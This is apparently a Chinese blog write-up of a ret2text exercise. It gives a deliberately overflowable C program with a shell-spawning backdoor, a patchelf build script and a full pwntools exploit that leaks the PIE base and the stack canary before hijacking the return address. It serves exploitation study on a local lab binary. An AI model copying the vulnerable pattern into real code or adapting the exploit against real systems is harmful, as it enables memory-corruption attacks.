boxmoe_header_banner_img

all in pwn!

文章导读

ret2text


avatar
admin 2026年7月8日 24

ret2text,覆盖返回地址中某个代码的地址,也就是某个后门函数。

linux默认数据进入缓冲区,所以设置

setbuf(stdin, NULL);
setbuf(stdout, NULL);
char buf[0x100];

原始脚本:

#include <stdio.h>
#include <unistd.h>
#include<string.h>
#include <stdlib.h>

void backdoor() {
    puts("this is backdoor.");
    system("/bin/sh");
}

int main() {
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);

    char buf[0x100];

    do {
        puts("please input:");
        read(0, buf, 0x200);
        puts(buf);
    } while (strcmp(buf, "exit") != 0);

    return 0;
}

编译的patch

import os

version="2.31"

libc_name="libc-"+version+".so"
ld_name="ld-"+version+".so"

os.system("gcc test.c -o test -g")
os.system("cp /glibc/{}/amd64/lib/{} .".format(version,libc_name))
os.system("cp /glibc/{}/amd64/lib/{} .".format(version,ld_name))
os.system("chmod 777 "+libc_name)
os.system("chmod 777 "+ld_name)

for file_name in list(os.walk("."))[0][2]:
	if "." not in file_name:
		os.system("patchelf --replace-needed libc.so.6 ./{} ./{}".format(libc_name,file_name))
		os.system("patchelf --set-interpreter ./{} ./{}".format(ld_name,file_name))

[*] '/home/ubuntu/pwn/user_pwn/fmt/2-2/test'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
    Debuginfo:  Yes

依旧u main 50起手,vmmap找到起始段

0x56039e58f281 <main+117>               call   puts@plt
pwndbg> p/x 0x56039e58f281-0x56039e58e000
$1 = 0x1281

查看栈上的参数,0xd8处有程序段的地址

p.sendafter("please input:\n", "a"*0xd8)
elf.address = u64(p.recvuntil(('\x55', '\x56'))[-6:].ljust(8,'\x00')) - 0x130d
info("elf base: " + hex(elf.address))

然后查看反汇编,发现canay在0x108的位置,所以直接输入0x109,因为canary有\x00截断,把\x00覆盖成0x61

p.sendafter("please input:\n", "a"*0x109)
p.recvuntil("a" * 0x109)
canary = u64(p.recv(7).ljust(8, '\x00')) << 8
info("canary: " + hex(canary))

写入后门函数即可

payload = 'exit'.ljust(0x108, '\x00')
payload += p64(canary)
payload += 'b' * 8
payload += p64(elf.sym['backdoor'])
p.sendafter("please input:\n", payload)

完整的exp

from pwn import *

elf = ELF("./test")
context(os=elf.os, arch=elf.arch)
context.log_level = 'debug'
p = process([elf.path])



p.sendafter("please input:\n", "a"*0xd8)
elf.address = u64(p.recvuntil(('\x55', '\x56'))[-6:].ljust(8,'\x00')) - 0x130d
info("elf base: " + hex(elf.address))

p.sendafter("please input:\n", "a"*0x109)
p.recvuntil("a" * 0x109)
canary = u64(p.recv(7).ljust(8, '\x00')) << 8
info("canary: " + hex(canary))

gdb.attach(p, "b *$rebase(0x1281)\nc")
pause()

payload = 'exit'.ljust(0x108, '\x00')
payload += p64(canary)
payload += 'b' * 8
payload += p64(elf.sym['backdoor'])
p.sendafter("please input:\n", payload)


p.interactive()


评论(0)

查看评论列表

暂无评论


发表评论

表情 颜文字
插入代码